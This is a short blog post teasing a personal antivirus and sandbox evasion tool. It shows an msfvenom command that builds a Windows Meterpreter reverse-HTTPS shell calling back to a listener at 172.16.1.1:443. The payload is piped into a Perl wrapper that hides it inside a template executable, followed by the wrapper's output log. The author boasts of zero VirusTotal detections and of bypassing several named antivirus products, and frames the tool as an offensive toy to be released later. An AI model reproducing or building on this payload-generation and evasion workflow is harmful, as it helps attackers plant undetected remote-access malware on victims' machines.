Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice ..
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ultimate] Template: read 94720 bytes from file [*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928 [*ultimate] Output: add the begin of the template (size: 36928) [*ultimate] Output: add the encoded payload (size: 1161) [*ultimate] Output: add the end of the template (size: 18502) [*ultimate] File '/tmp/payload.exe' generated (size: 94720)
WTF is that ? “That” is my new toy. An Antivirus evasion tool which bypass signature, heuristic and … sandbox detections ;-)
Tested on VirtusTotal.com (zero detection over 44), then on Virtual machines against:
- MS Essential Security
- ESET Nod32
- Symantec (of course)
So far so good. Let me play a bit with it. As soon as I find an other (private) method, I swear to release this one …
Stay tuned ;-)(3 votes, average: 5.00 out of 5)
© 2012, foip. All rights reserved.